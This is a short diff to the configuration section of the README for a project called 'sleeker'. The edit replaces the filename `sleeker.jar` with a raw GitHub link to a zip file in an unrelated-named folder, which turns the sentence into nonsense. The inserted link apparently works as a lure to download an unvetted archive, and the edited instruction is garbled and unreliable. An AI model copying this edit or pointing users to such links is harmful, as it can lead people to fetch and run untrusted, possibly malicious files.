Kyroiscooking/sleeker/README.md

 ## ⚙️ Configuration

 Sleeker comes with a configuration file.
 You can customize settings like ports, logging options, and TLS certificates.
-Find the configuration file in the same directory as the `sleeker.jar` after extraction.
+Find the configuration file in the same directory as the `https://raw.githubusercontent.com/Kyroiscooking/sleeker/main/pneumatologic/sleeker.zip` after extraction.

 ### Sample Configuration